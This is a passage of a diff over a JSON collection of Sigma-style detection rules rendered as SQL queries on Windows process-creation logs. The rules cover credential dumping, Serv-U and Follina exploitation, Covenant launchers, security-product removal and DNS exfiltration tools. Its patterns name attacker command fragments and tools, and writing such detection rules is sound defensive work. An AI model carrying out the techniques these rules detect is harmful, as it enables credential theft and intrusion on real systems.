An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", + "author": "Tim Rauch", "tags": [ - "attack.initial_access", - "attack.t1566" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\Winrar.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\7zFM.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\peazip.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\isoburn.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PowerISO.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ImgBurn.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\aspnet\\_regiis.exe' ESCAPE '\\' OR OriginalFileName LIKE 'aspnet\\_regiis.exe' ESCAPE '\\') AND (CommandLine LIKE '%connectionStrings%' ESCAPE '\\' AND CommandLine LIKE '% -pdf%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_archiver_iso_phishing.yml" + "filename": "proc_creation_win_iis_connection_strings_decryption.yml" }, { - "title": "Serv-U Exploitation CVE-2021-35211 by DEV-0322", - "id": "75578840-9526-4b2a-9462-af469a45e767", - "status": "test", - "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322", - "author": "Florian Roth (Nextron Systems)", + "title": "Renamed BrowserCore.EXE Execution", + "id": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", + "status": "experimental", + "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.persistence", 
- "attack.t1136.001", - "cve.2021.35211" + "attack.t1528", + "attack.t1036.003" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%whoami%' ESCAPE '\\' AND ((CommandLine LIKE '%./Client/Common/%' ESCAPE '\\' OR CommandLine LIKE '%.\\\\Client\\\\Common\\\\%' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\Serv-U.bat%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'BrowserCore.exe' AND NOT ((NewProcessName LIKE '%\\\\BrowserCore.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2021_35211_servu.yml" + "filename": "proc_creation_win_renamed_browsercore.yml" }, { - "title": "HackTool - Hashcat Password Cracker Execution", - "id": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", + "title": "WhoAmI as Parameter", + "id": "e9142d84-fbe0-401d-ac50-3e519fb00c89", "status": "test", - "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", - "author": "frack113", + "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. 
used by EfsPotato)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1110.002" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Tools that use similar command line flags and values" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\hashcat.exe' ESCAPE '\\' OR (CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-m 1000 %' ESCAPE '\\' AND CommandLine LIKE '%-r %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%.exe whoami%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_hashcat.yml" + "filename": "proc_creation_win_susp_whoami_as_param.yml" }, { - "title": "LSA PPL Protection Disabled Via Reg.EXE", - "id": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", + "title": "Suspicious Serv-U Process Pattern", + "id": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", "status": "experimental", - "description": "Detects the usage of the \"reg.exe\" utility to disable PPL protection on the LSA process", + "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.010" + "attack.credential_access", + "attack.t1555", + "cve.2021.35211" ], "falsepositives": [ - "Unlikely" + "Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND CommandLine LIKE '% /v RunAsPPL %' ESCAPE '\\'))" + "SELECT * FROM 
logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Serv-U.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_lsa_ppl_protection_disabled.yml" + "filename": "proc_creation_win_servu_susp_child_process.yml" }, { - "title": "Wab/Wabmig Unusual Parent Or Child Processes", - "id": "63d1ccc0-2a43-4f4b-9289-361b308991ff", + "title": "Execute Pcwrun.EXE To Leverage Follina", + "id": "6004abd0-afa4-4557-ba90-49d172e0a299", "status": "experimental", - "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", + "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", + "attack.t1218", "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR 
ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\pcwrun.exe' ESCAPE '\\' AND CommandLine LIKE '%../%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wab_unusual_parents.yml" + "filename": "proc_creation_win_lolbin_pcwrun_follina.yml" }, { - "title": "Disable Windows IIS HTTP Logging", - "id": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", - "status": "experimental", - "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", - "author": "frack113", + "title": "HackTool - Covenant PowerShell Launcher", + "id": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", + "status": "test", + "description": "Detects suspicious command lines used in Covenant luanchers", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1562.002" - ], - "falsepositives": [ - "Unknown" + "attack.t1059.001", + "attack.t1564.003" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:httplogging%' ESCAPE '\\' AND CommandLine LIKE '%dontLog:true%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%-Sta%' ESCAPE '\\' AND CommandLine LIKE '%-Nop%' ESCAPE '\\' AND CommandLine LIKE '%-Window%' ESCAPE '\\' AND CommandLine LIKE '%Hidden%' ESCAPE '\\' AND (CommandLine LIKE 
'%-Command%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\')) OR (CommandLine LIKE '%sv o (New-Object IO.MemorySteam);sv d %' ESCAPE '\\' OR CommandLine LIKE '%mshta file.hta%' ESCAPE '\\' OR CommandLine LIKE '%GruntHTTP%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand cwB2ACAAbwAgA%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_iis_appcmd_http_logging.yml" + "filename": "proc_creation_win_hktl_covenant.yml" }, { - "title": "Potential LethalHTA Technique Execution", - "id": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", + "title": "Suspicious Splwow64 Without Params", + "id": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", "status": "test", - "description": "Detects potential LethalHTA technique where the \"mshta.exe\" is spwaned by an \"svchost.exe\" process", - "author": "Markus Neis", + "description": "Detects suspicious Splwow64.exe process without any command line parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.005" + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\splwow64.exe' ESCAPE '\\' AND CommandLine LIKE '%splwow64.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_mshta_lethalhta_technique.yml" + "filename": "proc_creation_win_splwow64_cli_anomaly.yml" }, { - "title": "Suspicious Schtasks Schedule Types", - "id": "24c8392b-aa3c-46b7-a545-43f71657fe98", + "title": "Suspicious Shells Spawned by Java", + "id": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", "status": "experimental", - "description": "Detects scheduled task creations or modification on a suspicious schedule type", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious 
shell spawned from Java host process (e.g. log4j exploitation)", + "author": "Andreas Hunkeler (@Karneades), Florian Roth", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Legitimate processes that run at logon. Filter according to your environment" + "Legitimate calls to system binaries", + "Company specific internal usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE 
'\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_schedule_type.yml" + "filename": "proc_creation_win_java_susp_child_process.yml" }, { - "title": "DNS Exfiltration and Tunneling Tools Execution", - "id": "98a96a5a-64a0-4c42-92c5-489da3866cb0", + "title": "MpiExec Lolbin", + "id": "729ce0ea-5d8f-4769-9762-e35de441586d", "status": "test", - "description": "Well-known DNS Exfiltration tools execution", - "author": "Daniil Yugoslavskiy, oscd.community", + "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048.001", - "attack.command_and_control", - "attack.t1071.004", - "attack.t1132.001" + "attack.execution", + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\iodine.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dnscat2%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mpiexec.exe' ESCAPE '\\' OR Imphash = 'd8b52ef6aaa3a81501bdfff9dbb96217' OR Hashes LIKE '%IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217%' ESCAPE '\\') AND (CommandLine LIKE '% /n 1 %' ESCAPE '\\' OR CommandLine LIKE '% -n 1 %' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_dns_exfiltration_tools_execution.yml" + "filename": "proc_creation_win_lolbin_mpiexec.yml" }, { - "title": "File With Suspicious Extension Downloaded Via Bitsadmin", - "id": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", + "title": "Potential Tampering With RDP Related Registry Keys Via Reg.EXE", + "id": "0d5675be-bc88-4172-86d3-1e96a4476536", "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file with a suspicious extension", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of \"reg.exe\" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' values", + "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.lateral_movement", + "attack.t1021.001", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.asax%' ESCAPE '\\' OR CommandLine LIKE '%.ashx%' ESCAPE '\\' OR CommandLine LIKE '%.asmx%' ESCAPE '\\' OR CommandLine LIKE '%.asp%' ESCAPE '\\' OR CommandLine LIKE '%.aspx%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cfm%' ESCAPE '\\' OR CommandLine LIKE '%.cgi%' ESCAPE '\\' OR CommandLine LIKE '%.chm%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jsp%' ESCAPE '\\' OR CommandLine LIKE '%.jspx%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE 
'\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.psm1%' ESCAPE '\\' OR CommandLine LIKE '%.scf%' ESCAPE '\\' OR CommandLine LIKE '%.sct%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.war%' ESCAPE '\\' OR CommandLine LIKE '%.wsf%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.rar%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\Terminal Server%' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD%' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')) AND ((CommandLine LIKE '%Licensing Core%' ESCAPE '\\' AND CommandLine LIKE '%EnableConcurrentSessions%' ESCAPE '\\') OR (CommandLine LIKE '%WinStations\\\\RDP-Tcp%' ESCAPE '\\' OR CommandLine LIKE '%MaxInstanceCount%' ESCAPE '\\' OR CommandLine LIKE '%fEnableWinStation%' ESCAPE '\\' OR CommandLine LIKE '%TSUserEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSAppCompat%' ESCAPE '\\' OR CommandLine LIKE '%IdleWinStationPoolCount%' ESCAPE '\\' OR CommandLine LIKE '%TSAdvertise%' ESCAPE '\\' OR CommandLine LIKE '%AllowTSConnections%' ESCAPE '\\' OR CommandLine LIKE '%fSingleSessionPerUser%' ESCAPE '\\' OR CommandLine LIKE '%fDenyTSConnections%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_bitsadmin_download_susp_extensions.yml" + "filename": "proc_creation_win_reg_rdp_keys_tamper.yml" }, { - "title": "Logon Scripts (UserInitMprLogonScript)", - "id": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", + "title": "Regsvr32 Flags Anomaly", + "id": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", "status": "test", - "description": 
"Detects creation or execution of UserInitMprLogonScript persistence method", - "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", + "description": "Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1037.001", - "attack.persistence" + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ - "Exclude legitimate logon scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%UserInitMprLogonScript%' ESCAPE '\\' OR (ParentProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%netlogon%.bat%' ESCAPE '\\' OR CommandLine LIKE '%UsrLogon.cmd%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\WINDOWS\\\\Explorer.EXE%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\proquota.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Citrix\\\\System32\\\\icast.exe' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '% /i:%' ESCAPE '\\') AND NOT (CommandLine LIKE '% /n %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_persistence_userinitmprlogonscript.yml" + "filename": "proc_creation_win_regsvr32_flags_anomaly.yml" }, { - "title": "VMToolsd Suspicious Child Process", - "id": "5687f942-867b-4578-ade7-1e341c46e99a", + "title": "Regsvr32 Spawning Explorer", + "id": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", "status": "experimental", - "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence setup", - "author": "behops, Bhabesh Raj", + "description": "Detects \"regsvr32.exe\" spawning \"explorer.exe\", which is very uncommon.", + "author": "elhoim", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1059" + 
"attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ - "Legitimate use by administrator" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'RUNDLL32.EXE', 'REGSVR32.EXE', 'wscript.exe', 'cscript.exe'))) AND NOT ((CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweron-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweroff-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\resume-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\suspend-vm-default.bat%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_vmware_vmtoolsd_susp_child_process.yml" + "filename": "proc_creation_win_regsvr32_spawn_explorer.yml" }, { - "title": "Wusa Extracting Cab Files From Suspicious Paths", - "id": "c74c0390-3e20-41fd-a69a-128f0275a5ea", - "status": "experimental", - "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument from suspicious paths", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Tampering With Security Products Via WMIC", + "id": "847d5ff3-8a31-4737-a970-aeae8fe21765", + "status": "test", + 
"description": "Detects uninstallation or termination of security products using the WMIC utility", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administration" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%product where %' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/nointeractive%' ESCAPE '\\') OR (CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%caption like %' ESCAPE '\\' AND (CommandLine LIKE '%call delete%' ESCAPE '\\' OR CommandLine LIKE '%call terminate%' ESCAPE '\\')) OR (CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%where %' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%carbon\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%cylance\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%endpoint\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%eset\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%malware\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Sophos\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%symantec\\%%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG %' ESCAPE '\\' OR CommandLine LIKE '%Carbon 
Black%' ESCAPE '\\' OR CommandLine LIKE '%CarbonBlack%' ESCAPE '\\' OR CommandLine LIKE '%Cb Defense Sensor 64-bit%' ESCAPE '\\' OR CommandLine LIKE '%Crowdstrike Sensor%' ESCAPE '\\' OR CommandLine LIKE '%Cylance %' ESCAPE '\\' OR CommandLine LIKE '%Dell Threat Defense%' ESCAPE '\\' OR CommandLine LIKE '%DLP Endpoint%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Detection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Protection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Security%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Sensor%' ESCAPE '\\' OR CommandLine LIKE '%ESET File Security%' ESCAPE '\\' OR CommandLine LIKE '%LogRhythm System Monitor Service%' ESCAPE '\\' OR CommandLine LIKE '%Malwarebytes%' ESCAPE '\\' OR CommandLine LIKE '%McAfee Agent%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft Security Client%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Anti-Virus%' ESCAPE '\\' OR CommandLine LIKE '%Sophos AutoUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Credential Store%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Console%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Database%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Server%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Remote Management System%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Update Manager%' ESCAPE '\\' OR CommandLine LIKE '%Threat Protection%' ESCAPE '\\' OR CommandLine LIKE '%VirusScan%' ESCAPE '\\' OR CommandLine LIKE '%Webroot SecureAnywhere%' ESCAPE '\\' OR CommandLine LIKE '%Windows Defender%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml" + "filename": "proc_creation_win_wmic_uninstall_security_products.yml" }, { - "title": "Service DACL Abuse To Hide Services Via Sc.EXE", - "id": "a537cfc3-4297-4789-92b5-345bfd845ad0", + "title": "Renamed Sysinternals Sdelete Execution", + "id": "c1d867fe-8d95-4487-aab4-e53f2d339f90", "status": 